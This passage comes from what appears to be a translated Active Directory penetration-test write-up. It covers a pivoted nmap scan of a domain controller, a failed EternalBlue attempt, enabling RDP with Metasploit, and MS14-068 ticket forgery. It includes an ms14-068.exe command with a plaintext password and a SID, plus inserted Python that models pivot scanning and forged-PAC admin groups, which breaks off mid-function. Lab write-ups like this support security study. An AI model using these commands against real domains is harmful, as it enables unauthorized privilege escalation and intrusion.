<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">msrpc</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">139/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">netbios-ssn</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">389/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">ldap</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">445/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">microsoft-ds</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">464/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">kpasswd5</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">593/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">http-rpc-epmap</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">636/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">ldapssl</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">3268/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.7pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.9pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">globalcatLDAP</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">3269/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.7pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.9pt;margin-right:0cm;margin-top:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">globalcatLDAPssl</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49152/tcp open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49153/tcp open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49154/tcp open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49156/tcp open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49157/tcp open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49158/tcp open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:12.9pt;">
<td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49163/tcp open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
</p>
</td>
</tr>
</tbody>
</table>
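<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The three steps above (autoroute, SOCKS proxy, proxychains nmap) and the scan result are pulled together in the following added example. It is not code from this write-up: it builds the proxychains entry and an nmap command line that is valid through a SOCKS proxy (refusing the raw-socket options that silently fail there), then parses nmap output and decides whether the host is a domain controller. It assumes Metasploit's socks4a server is on 127.0.0.1:1080, and the nmap text embedded in it is a constructed sample copied from the scan of 10.10.10.149 above.</span><span lang="EN-US"></span>
</p>

```python
"""Pivot-scan helper for the autoroute -> socks4a -> proxychains/nmap steps.
Added example, not code from the original write-up.
Assumptions: Metasploit's socks4a server listens on 127.0.0.1:1080 (its
default SRVPORT) and proxychains is configured to use it. The nmap output
below is a constructed sample mirroring the page's scan of the DC."""

import re
from typing import Dict, List, Optional

# nmap options that need raw sockets or ICMP. A SOCKS proxy only relays
# complete TCP connections, so these return nothing useful through it.
RAW_SOCKET_FLAGS = {"-sS", "-sU", "-sA", "-sW", "-sM", "-sN", "-sF", "-sX",
                    "-O", "--traceroute"}


def proxychains_entry(host: str = "127.0.0.1", port: int = 1080) -> str:
    """[ProxyList] line for /etc/proxychains.conf. Metasploit's socks4a
    server is addressed with the 'socks4' keyword in proxychains."""
    return f"socks4 {host} {port}"


def pivot_nmap_argv(target: str, extra: Optional[List[str]] = None) -> List[str]:
    """Build an nmap argv usable through the proxy: full TCP connect (-sT)
    and no host discovery (-Pn) are forced. -A is expanded to the parts
    that still work over SOCKS (version and script scan); options that
    need raw packets are rejected instead of failing silently."""
    opts: List[str] = []
    for opt in extra or []:
        if opt == "-A":
            opts += ["-sV", "-sC"]      # -A also implies -O/--traceroute; dropped
        elif opt in RAW_SOCKET_FLAGS:
            raise ValueError(f"{opt} cannot traverse a SOCKS proxy")
        else:
            opts.append(opt)
    return ["proxychains", "nmap", "-sT", "-Pn", *opts, target]


PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)", re.MULTILINE)


def parse_open_tcp(nmap_text: str) -> Dict[int, str]:
    """Map each open TCP port to the service name nmap printed."""
    return {int(port): svc
            for port, proto, state, svc in PORT_LINE.findall(nmap_text)
            if proto == "tcp" and state == "open"}


# Listeners that together identify an Active Directory domain controller:
# Kerberos, LDAP, the Kerberos password-change service and the Global Catalog.
DC_SIGNATURE = (88, 389, 464, 3268)


def looks_like_dc(open_ports: Dict[int, str]) -> bool:
    return all(p in open_ports for p in DC_SIGNATURE)


def rpc_dynamic_ports(open_ports: Dict[int, str]) -> List[int]:
    """Ports in the Windows RPC dynamic range. nmap labels them 'unknown';
    the endpoint mapper on 135/tcp hands them out to RPC services."""
    return sorted(p for p in open_ports if 49152 <= p <= 65535)


# Constructed sample, matching the scan result shown on the page.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.149
Host is up (0.98s latency).
Not shown: 982 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49163/tcp open  unknown
"""

if __name__ == "__main__":
    print(proxychains_entry())
    print(" ".join(pivot_nmap_argv("10.10.10.149", ["-A"])))
    ports = parse_open_tcp(SAMPLE_NMAP_OUTPUT)
    print(f"{len(ports)} open TCP ports, domain controller: {looks_like_dc(ports)}")
    print("RPC dynamic ports:", rpc_dynamic_ports(ports))
```

<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The 88/389/464/3268 combination is what marks 10.10.10.149 as the DC rather than just another Windows file server; the 4915x ports are RPC endpoints allocated by the mapper on 135 and are normal on any Windows Server.</span><span lang="EN-US"></span>
</p>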
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:30.55pt;margin-left:-.25pt;">
<a name="_Toc21070"></a><span lang="EN-US">5.1.10. </span><span><span style="font-family:宋体;font-weight:normal;">Attempt EternalBlue (</span><span lang="EN-US">ms17_010</span></span><span><span style="font-family:宋体;font-weight:normal;">) against the DC</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:5.95pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="240" src="https://www.2k8.org/content/uploadfile/202203/17/80149123.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:40.95pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The exploit attempt fails, so a memory-corruption path to the DC is off the table and the rest of the chain goes through Kerberos (MS14-068) instead.</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:11.4pt;margin-left:-.75pt;text-indent:0cm;tab-stops:center 126.1pt;">
<a name="_Toc21071"></a><span lang="EN-US">5.1.11.<span> </span>ms14-068 </span><span><span style="font-family:宋体;font-weight:normal;">prerequisites</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:39.95pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">This </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">exp </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">needs the credentials of an ordinary domain user: the username, its password and its SID, plus a domain controller reachable on 88/tcp that has not received the MS14-068 fix (KB3011780). The </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">web </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">host is a domain member and its account is a domain user, but at this point the password is not known.</span><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21072"></a><span lang="EN-US">5.1.12. </span><span><span style="font-family:宋体;font-weight:normal;">Enable Remote Desktop</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/manage/enable_rdp</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">rdesktop 192.168.0.150</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:25.55pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="363" src="https://www.2k8.org/content/uploadfile/202203/17/941f0f58.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:8.35pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="422" src="https://www.2k8.org/content/uploadfile/202203/17/a7d27de9.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The password appears to be correct; the logon is refused only because the account is not a member of the Remote Desktop Users group. The enable_rdp module's USERNAME and PASSWORD options create a local account that is placed in that group, which avoids this problem (at the cost of a new, noisy account on the host).</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:22.35pt;margin-left:-.75pt;text-indent:0cm;tab-stops:center 134.15pt;">
<a name="_Toc21073"></a><span lang="EN-US">5.1.13.<span> </span>ms14-068 </span><span><span style="font-family:宋体;font-weight:normal;">privilege escalation to the DC</span></span><span lang="EN-US"></span>
</h3>
<h6 style="margin-left:-.25pt;">
<span lang="EN-US">5.1.13.1. </span><span style="font-family:黑体;font-weight:normal;">Create the ticket with </span><span lang="EN-US">ms14-068.exe</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.15pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The values below (user, SID, DC address, password) come from the earlier </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">metasploit </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">enumeration; scroll up to find them. -s takes the SID of the user account itself (the domain SID with the user's RID appended), -d the DC, and -p the user's current password; the tool requests a TGT with that password and then a ticket carrying a forged PAC that makes the user a domain administrator.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ms14-068.exe -u [email protected] -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:30.4pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="108" src="https://www.2k8.org/content/uploadfile/202203/17/6b219791.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
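<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Why the prerequisites in 5.1.11 are enough, and what the ticket created in 5.1.13.1 actually claims, is shown by the following added example; it is not code from this write-up nor from ms14-068.exe. It is a deliberately simplified model: the PAC is a dict rather than the real NDR-encoded structure, the keyed checksum is plain HMAC-MD5 instead of the Kerberos RC4-HMAC construction, and KDC_KEY is a constructed test value. The SID is the one from the command above; the privileged-group set is assumed to match what public pykek-style exploits put in the forged PAC.</span><span lang="EN-US"></span>
</p>

```python
"""Simplified model of the MS14-068 PAC-signature flaw and of the forged PAC.
Added example; not code from the write-up or from any exploit tool.
Simplifications: the PAC is a dict (not NDR), the keyed checksum is plain
HMAC-MD5 (not Kerberos RC4-HMAC), and KDC_KEY is a constructed test key.
The group RID list is assumed to match public pykek-style exploits."""

import hashlib
import hmac
import json
import re
from typing import Dict, List, Tuple

# Checksum type identifiers as they appear in PAC_SIGNATURE_DATA.
RSA_MD5 = 7          # unkeyed: anyone can compute it over the PAC bytes
HMAC_MD5 = -138      # keyed: needs the service key / krbtgt key

KDC_KEY = b"constructed-krbtgt-key-for-the-example"

# RIDs asserted by the forged PAC (assumption: pykek-style tools):
# 513 Domain Users, 512 Domain Admins, 520 Group Policy Creator Owners,
# 518 Schema Admins, 519 Enterprise Admins.
PRIV_GROUP_RIDS = [513, 512, 520, 518, 519]

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(user_sid: str) -> Tuple[str, int]:
    """Return (domain SID, RID). ms14-068.exe -s expects the user's SID;
    the domain SID for the group SIDs is derived from it."""
    m = SID_RE.match(user_sid)
    if not m:
        raise ValueError(f"not a domain account SID: {user_sid}")
    return m.group(1), int(m.group(2))


def forge_pac(user_sid: str) -> Dict[str, object]:
    """PAC that makes an ordinary user a member of the admin groups."""
    domain_sid, rid = split_sid(user_sid)
    return {"domain_sid": domain_sid, "user_rid": rid,
            "group_rids": list(PRIV_GROUP_RIDS)}


def forged_group_sids(user_sid: str) -> List[str]:
    """Full group SIDs the ticket asserts (handy for reading whoami output)."""
    domain_sid, _ = split_sid(user_sid)
    return [f"{domain_sid}-{rid}" for rid in PRIV_GROUP_RIDS]


def pac_bytes(pac: Dict[str, object]) -> bytes:
    return json.dumps(pac, sort_keys=True).encode()


def pac_checksum(ctype: int, data: bytes, key: bytes = b"") -> bytes:
    if ctype == RSA_MD5:
        return hashlib.md5(data).digest()
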